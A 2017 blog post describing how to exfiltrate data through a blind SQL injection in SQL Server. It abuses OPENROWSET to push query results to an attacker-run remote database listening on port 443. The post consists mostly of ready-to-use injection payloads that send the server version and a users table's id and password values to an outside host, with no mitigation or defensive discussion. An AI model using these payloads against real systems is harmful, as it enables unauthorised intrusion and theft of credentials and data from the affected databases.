Tuesday, February 14, 2017

Blind SQLi, Data exfiltration

When sqlmap fails

It is generally a very slow process to exfiltrate data through a blind sql injection. What is worse is that sqlmap fails on  you in one of those cases and is unable to retrieve the data. *sad face*

However, in some special cases there might be an easier way to exfiltrate data from the database. One of those cases can be when the database is able to connect to the internet over any port/ports. Let us take an example and see how it can be done.

For example, let us assume we found an sql inject on the parameter 'p0' on a website randomsite.vom?p0=canary. Let suppose the database can also connect to the internet on port 443. We will call this database 'Vulnerable Database'.

Now what we can do is, set-up a remote database over the internet on another machine and run it's service on port 443 instead of the default. Them we can use 'openrowset' to exfiltrate data from the vulnerable DB to the remote DB. I will jump right into the juicy part and in case anyone is interested to know more about 'openrowset' and how it works there are links in the references.  Long story short it can be used for DB replication.

Now the generic attack payload would look like this:

randomsite.vom?p0=canary';insert into openrowset (connection details, query remote db) values (query to be run on vulnerable server)--

Now, suppose you want to find out the version of the vulnerable database. then you can change it to:

randomsite.vom?p0=canary';insert into openrowset ('SQLOLEDB', 'DRIVER={SQL Server};SERVER=192.168.43.0,443;UID=sa;PWD=pass','select * from foo') values (@@version)--

Here, foo is table in the remote DB. The table foo should have exactly the same number of columns as the number of columns returned by the query run on vulnerable DB . Here foo has only one column as the output also has one column. If you want to avoid that then you can concat everything and throw it in single column.

Example, assume the vulnerable DB has a table named 'user' which has columns 'id' and 'pass'. 

randomsite.vom?p0=canary';insert into openrowset ('SQLOLEDB', 'DRIVER={SQL Server};SERVER=192.168.43.0,443;UID=sa;PWD=pass','select * from foo') values select concat(id,0x3a,pass) from user--

Assumptions made in above method:
  • Blind SQL injection (in other cases this might be just overkill)
  • Database can connect over the internet.
  • SQL Server assumed. Similar attacks might work on other Vendors such as mysql  


Credits : V Razdan

References:
  • http://securityhorror.blogspot.in/2012/03/mssql-injection-openrowset-side-channel.html
  • https://msdn.microsoft.com/en-us/library/ms190312.aspx

Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)